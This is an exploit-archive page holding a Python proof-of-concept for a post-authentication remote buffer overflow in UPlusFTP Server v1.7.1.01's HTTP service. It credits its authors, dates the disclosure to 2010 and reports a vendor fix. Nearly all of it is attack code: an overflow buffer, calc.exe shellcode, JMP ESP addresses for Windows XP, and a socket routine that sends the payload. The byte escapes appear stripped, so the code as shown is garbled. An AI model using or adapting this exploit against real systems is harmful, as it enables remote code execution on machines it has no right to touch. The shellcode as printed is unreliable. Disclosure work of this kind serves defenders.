UPlusFTP Server v1.7.1.01 [ HTTP ] Remote Buffer Overflow [ Post Auth ]

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : UPlusFTP Server v1.7.1.01 [ HTTP ] Remote Buffer Overflow [ Post Auth ]
# Published : 2010-07-28
# Author : Karn Ganeshen and corelanc0d3r
# Previous Title : Symantec AMS Intel Alert Handler Service Design Flaw
# Next Title : BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)

#!/usr/bin/python
import socket,sys,base64

print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
	UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
	Discovered by : Karn Ganeshen		   		   		   
	Author : Karn Ganeshen / corelanc0d3r
						   						   
	KarnGaneshen [aT] gmail [d0t] com 				   		   
	http://ipositivesecurity.blogspot.com
								   			   
	Greetz out to: 	corelanc0d3r
					http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010

if len(sys.argv) != 5:
    print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
    sys.exit(1)
 
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]

auth = base64.b64encode(user+":"+pwd)

buf="A"*1963
buf+="x90"*179

# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("xd9xcax29xc9xb1x24xbfx3fxc7x66x9fxd9x74x24xf4x5e"
"x31x7ex17x03x7ex17x83xf9xc3x84x6axf9x24x0cx95x01"
"xb5x06xd0x3dx3ex64xdex45x41x7ax6bxfax59x0fx33x24"
"x5bxe4x85xafx6fx71x14x41xbex45x8ex31x45x85xc5x4e"
"x87xccx2bx51xc5x3axc7x6ax9dx98x2cxf9xf8x6ax73x25"
"x02x86xeaxaex08x13x78xefx0cxa2x95x84x31x2fx68x71"
"xc0x73x4fx81x10xbax4fxedx1dxfdx7fx68xe1x86x73xf9"
"xa2x7ax07x8dx3ex2ex9cx05x37xdbxaax5exc7xabxadx60"
"xc8x40xc5x5cx97x67xe0xfcx71x01xf4x7fxbdx6ax55x17"
"xcex07x51xb8x46x80xa4xccx99xe7xa7x37xc6x66x34xd4"
"x27x0cxbcx7fx38")

buf+="x90"*15

#[ XP SP2 ] -> "x78x16xF3x77"	#0x77F31678  JMP ESP
buf+="x78x16xF3x77"

#[ XP SP3 ] -> "x3Fx71x49x7E"   #0x7E49713F  JMP ESP
#buf+="x3Fx71x49x7E"

buf+="x90"*30
buf+="x66x05x7Ax03"      	#ADD AX,037A
buf+="x66x05x7Ax03"      	#ADD AX,037A
buf+="x66x05x7Ax03"      	#ADD AX,037A
buf+="x50xc3"             	#PUSH EAX + RET

print "[+] Launching exploit against " + target + "..."

head = "GET /list.html?path="+buf+" HTTP/1.1 rn"
head += "Host: rn"
head += "Authorization: Basic "+auth+"rn"
 
try:
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((target, port))
	s.send(head + "rn")
	print "[!] Payload sent..."
	s.close()
except:
	print "[x] Error!"